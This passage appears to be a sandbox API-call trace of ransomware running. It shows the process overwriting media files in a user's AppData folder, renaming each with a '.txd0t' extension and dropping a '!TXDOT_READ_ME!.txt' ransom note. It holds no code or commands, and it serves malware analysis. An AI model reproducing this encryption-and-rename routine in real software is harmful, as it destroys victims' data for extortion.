lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f650*=0x7680, lpOverlapped=0x0) returned 1 [0072.145] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xffff8980, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.145] WriteFile (in: hFile=0x46c, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x7680, lpNumberOfBytesWritten=0x414f654, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f654*=0x7680, lpOverlapped=0x0) returned 1 [0072.145] FlushFileBuffers (hFile=0x46c) returned 1 [0072.165] GetProcessHeap () returned 0xe30000 [0072.165] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x11e) returned 0xe9b648 [0072.165] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\0R6G zd4i6nTDGa8VNm.png" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\0R6G zd4i6nTDGa8VNm.png") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\0R6G zd4i6nTDGa8VNm.png" [0072.165] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\0R6G zd4i6nTDGa8VNm.png") returned="0R6G zd4i6nTDGa8VNm.png" [0072.165] StrCpyW (in: psz1=0xe9b690, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.165] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\!TXDOT_READ_ME!.txt") returned 0 [0072.165] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\!TXDOT_READ_ME!.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x478 [0072.167] WriteFile (in: hFile=0x478, lpBuffer=0x414f684*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x414f680, lpOverlapped=0x0 | out: lpBuffer=0x414f684*, lpNumberOfBytesWritten=0x414f680*=0x2, lpOverlapped=0x0) returned 1 [0072.167] FlushFileBuffers (hFile=0x478) returned 1 [0072.184] WriteFile (in: hFile=0x478, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x414f680, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x414f680*=0x7f0, lpOverlapped=0x0) returned 1 [0072.191] FlushFileBuffers (hFile=0x478) returned 1 [0072.197] CloseHandle (hObject=0x478) returned 1 [0072.198] GetProcessHeap () returned 0xe30000 [0072.198] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0072.198] CloseHandle (hObject=0x46c) returned 1 [0072.199] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\0R6G zd4i6nTDGa8VNm.png" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\0r6g zd4i6ntdga8vnm.png"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\0R6G zd4i6nTDGa8VNm.png.txd0t" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\0r6g zd4i6ntdga8vnm.png.txd0t")) returned 1 [0072.200] SetEvent (hEvent=0x404) returned 1 [0072.200] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0072.204] StrCpyW (in: psz1=0x414f690, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\aNTcu_iQUI-LLKOyho.avi" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\aNTcu_iQUI-LLKOyho.avi") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\aNTcu_iQUI-LLKOyho.avi" [0072.204] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\aNTcu_iQUI-LLKOyho.avi", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\aNTcu_iQUI-LLKOyho.avi.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\aNTcu_iQUI-LLKOyho.avi.txd0t" [0072.204] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\aNTcu_iQUI-LLKOyho.avi.txd0t") returned 0 [0072.204] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\aNTcu_iQUI-LLKOyho.avi", dwFileAttributes=0x80) returned 1 [0072.205] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\aNTcu_iQUI-LLKOyho.avi" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\antcu_iqui-llkoyho.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x468 [0072.205] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=80395) returned 1 [0072.205] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.205] WriteFile (in: hFile=0x468, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0072.205] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xfffec3f5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.205] ReadFile (in: hFile=0x468, lpBuffer=0x380d020, nNumberOfBytesToRead=0x13a00, lpNumberOfBytesRead=0x414f650, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f650*=0x13a00, lpOverlapped=0x0) returned 1 [0072.210] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xfffec600, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.210] WriteFile (in: hFile=0x468, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x13a00, lpNumberOfBytesWritten=0x414f654, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f654*=0x13a00, lpOverlapped=0x0) returned 1 [0072.210] FlushFileBuffers (hFile=0x468) returned 1 [0072.228] GetProcessHeap () returned 0xe30000 [0072.228] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x11c) returned 0xe9b648 [0072.228] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\aNTcu_iQUI-LLKOyho.avi" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\aNTcu_iQUI-LLKOyho.avi") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\aNTcu_iQUI-LLKOyho.avi" [0072.228] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\aNTcu_iQUI-LLKOyho.avi") returned="aNTcu_iQUI-LLKOyho.avi" [0072.228] StrCpyW (in: psz1=0xe9b690, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.228] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\!TXDOT_READ_ME!.txt") returned 1 [0072.228] GetProcessHeap () returned 0xe30000 [0072.228] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0072.228] CloseHandle (hObject=0x468) returned 1 [0072.231] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\aNTcu_iQUI-LLKOyho.avi" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\antcu_iqui-llkoyho.avi"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\aNTcu_iQUI-LLKOyho.avi.txd0t" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\antcu_iqui-llkoyho.avi.txd0t")) returned 1 [0072.231] SetEvent (hEvent=0x404) returned 1 [0072.231] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0072.238] StrCpyW (in: psz1=0x414f6a0, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\CUCgHoAM.wav" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\CUCgHoAM.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\CUCgHoAM.wav" [0072.238] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\CUCgHoAM.wav", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\CUCgHoAM.wav.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\CUCgHoAM.wav.txd0t" [0072.238] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\CUCgHoAM.wav.txd0t") returned 0 [0072.238] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\CUCgHoAM.wav", dwFileAttributes=0x80) returned 1 [0072.238] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\CUCgHoAM.wav" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\cucghoam.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0072.238] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=77481) returned 1 [0072.239] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.239] WriteFile (in: hFile=0x474, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0072.239] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffecf57, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.239] ReadFile (in: hFile=0x474, lpBuffer=0x380d020, nNumberOfBytesToRead=0x12ea0, lpNumberOfBytesRead=0x414f660, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f660*=0x12ea0, lpOverlapped=0x0) returned 1 [0072.241] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffed160, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.241] WriteFile (in: hFile=0x474, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x12ea0, lpNumberOfBytesWritten=0x414f664, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f664*=0x12ea0, lpOverlapped=0x0) returned 1 [0072.241] FlushFileBuffers (hFile=0x474) returned 1 [0072.253] GetProcessHeap () returned 0xe30000 [0072.253] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x108) returned 0xe9d750 [0072.253] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\CUCgHoAM.wav" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\CUCgHoAM.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\CUCgHoAM.wav" [0072.253] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\CUCgHoAM.wav") returned="CUCgHoAM.wav" [0072.254] StrCpyW (in: psz1=0xe9d798, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.254] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\!TXDOT_READ_ME!.txt") returned 1 [0072.254] GetProcessHeap () returned 0xe30000 [0072.254] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0072.254] CloseHandle (hObject=0x474) returned 1 [0072.256] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\CUCgHoAM.wav" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\cucghoam.wav"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\CUCgHoAM.wav.txd0t" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\cucghoam.wav.txd0t")) returned 1 [0072.257] SetEvent (hEvent=0x404) returned 1 [0072.257] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0072.266] StrCpyW (in: psz1=0x414f6a0, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\DRvrEGQ_bV7.png" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\DRvrEGQ_bV7.png") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\DRvrEGQ_bV7.png" [0072.266] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\DRvrEGQ_bV7.png", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\DRvrEGQ_bV7.png.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\DRvrEGQ_bV7.png.txd0t" [0072.266] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\DRvrEGQ_bV7.png.txd0t") returned 0 [0072.266] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\DRvrEGQ_bV7.png", dwFileAttributes=0x80) returned 1 [0072.266] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\DRvrEGQ_bV7.png" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\drvregq_bv7.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x468 [0072.266] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=92028) returned 1 [0072.267] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.267] WriteFile (in: hFile=0x468, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0072.267] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xfffe9684, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.267] ReadFile (in: hFile=0x468, lpBuffer=0x380d020, nNumberOfBytesToRead=0x16770, lpNumberOfBytesRead=0x414f660, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f660*=0x16770, lpOverlapped=0x0) returned 1 [0072.269] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xfffe9890, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.269] WriteFile (in: hFile=0x468, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x16770, lpNumberOfBytesWritten=0x414f664, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f664*=0x16770, lpOverlapped=0x0) returned 1 [0072.269] FlushFileBuffers (hFile=0x468) returned 1 [0072.283] GetProcessHeap () returned 0xe30000 [0072.283] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x10e) returned 0xe9b648 [0072.283] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\DRvrEGQ_bV7.png" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\DRvrEGQ_bV7.png") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\DRvrEGQ_bV7.png" [0072.283] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\DRvrEGQ_bV7.png") returned="DRvrEGQ_bV7.png" [0072.283] StrCpyW (in: psz1=0xe9b690, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.283] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\!TXDOT_READ_ME!.txt") returned 1 [0072.283] GetProcessHeap () returned 0xe30000 [0072.283] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0072.283] CloseHandle (hObject=0x468) returned 1 [0072.286] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\DRvrEGQ_bV7.png" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\drvregq_bv7.png"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\DRvrEGQ_bV7.png.txd0t" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\drvregq_bv7.png.txd0t")) returned 1 [0072.287] SetEvent (hEvent=0x404) returned 1 [0072.287] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0072.299] StrCpyW (in: psz1=0x414f690, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\f_xuR_I_FeQoISyA_I.avi" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\f_xuR_I_FeQoISyA_I.avi") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\f_xuR_I_FeQoISyA_I.avi" [0072.299] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\f_xuR_I_FeQoISyA_I.avi", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\f_xuR_I_FeQoISyA_I.avi.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\f_xuR_I_FeQoISyA_I.avi.txd0t" [0072.299] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\f_xuR_I_FeQoISyA_I.avi.txd0t") returned 0 [0072.299] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\f_xuR_I_FeQoISyA_I.avi", dwFileAttributes=0x80) returned 1 [0072.299] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\f_xuR_I_FeQoISyA_I.avi" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\f_xur_i_feqoisya_i.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x47c [0072.299] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=57650) returned 1 [0072.299] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.300] WriteFile (in: hFile=0x47c, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0072.300] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xffff1cce, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.300] ReadFile (in: hFile=0x47c, lpBuffer=0x380d020, nNumberOfBytesToRead=0xe130, lpNumberOfBytesRead=0x414f650, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f650*=0xe130, lpOverlapped=0x0) returned 1 [0072.301] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0xffff1ed0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.301] WriteFile (in: hFile=0x47c, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0xe130, lpNumberOfBytesWritten=0x414f654, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f654*=0xe130, lpOverlapped=0x0) returned 1 [0072.301] FlushFileBuffers (hFile=0x47c) returned 1 [0072.315] GetProcessHeap () returned 0xe30000 [0072.315] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x11c) returned 0xe9b648 [0072.315] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\f_xuR_I_FeQoISyA_I.avi" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\f_xuR_I_FeQoISyA_I.avi") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\f_xuR_I_FeQoISyA_I.avi" [0072.315] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\f_xuR_I_FeQoISyA_I.avi") returned="f_xuR_I_FeQoISyA_I.avi" [0072.315] StrCpyW (in: psz1=0xe9b690, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.316] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\!TXDOT_READ_ME!.txt") returned 1 [0072.316] GetProcessHeap () returned 0xe30000 [0072.316] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0072.316] CloseHandle (hObject=0x47c) returned 1 [0072.318] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\f_xuR_I_FeQoISyA_I.avi" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\f_xur_i_feqoisya_i.avi"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\f_xuR_I_FeQoISyA_I.avi.txd0t" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\f_xur_i_feqoisya_i.avi.txd0t")) returned 1 [0072.319] SetEvent (hEvent=0x404) returned 1 [0072.319] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0072.324] StrCpyW (in: psz1=0x414f6b0, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\jZeT4BL.m4a" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\jZeT4BL.m4a") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\jZeT4BL.m4a" [0072.324] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\jZeT4BL.m4a", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\jZeT4BL.m4a.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\jZeT4BL.m4a.txd0t" [0072.324] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\jZeT4BL.m4a.txd0t") returned 0 [0072.324] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\jZeT4BL.m4a", dwFileAttributes=0x80) returned 1 [0072.324] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\jZeT4BL.m4a" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\jzet4bl.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0072.324] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=12166) returned 1 [0072.325] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.325] WriteFile (in: hFile=0x474, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0072.325] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffffce7a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.325] ReadFile (in: hFile=0x474, lpBuffer=0x380d020, nNumberOfBytesToRead=0x2f80, lpNumberOfBytesRead=0x414f670, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f670*=0x2f80, lpOverlapped=0x0) returned 1 [0072.325] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffffd080, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.325] WriteFile (in: hFile=0x474, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x2f80, lpNumberOfBytesWritten=0x414f674, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f674*=0x2f80, lpOverlapped=0x0) returned 1 [0072.325] FlushFileBuffers (hFile=0x474) returned 1 [0072.340] GetProcessHeap () returned 0xe30000 [0072.340] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x106) returned 0xe9d750 [0072.340] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\jZeT4BL.m4a" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\jZeT4BL.m4a") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\jZeT4BL.m4a" [0072.340] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\jZeT4BL.m4a") returned="jZeT4BL.m4a" [0072.340] StrCpyW (in: psz1=0xe9d798, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.340] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\!TXDOT_READ_ME!.txt") returned 1 [0072.340] GetProcessHeap () returned 0xe30000 [0072.340] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0072.340] CloseHandle (hObject=0x474) returned 1 [0072.341] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\jZeT4BL.m4a" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\jzet4bl.m4a"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\jZeT4BL.m4a.txd0t" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\jzet4bl.m4a.txd0t")) returned 1 [0072.342] SetEvent (hEvent=0x404) returned 1 [0072.342] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0072.347] StrCpyW (in: psz1=0x414f690, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\n5hRh8HkX hRtD-9n.png" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\n5hRh8HkX hRtD-9n.png") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\n5hRh8HkX hRtD-9n.png" [0072.347] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\n5hRh8HkX hRtD-9n.png", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\n5hRh8HkX hRtD-9n.png.txd0t") 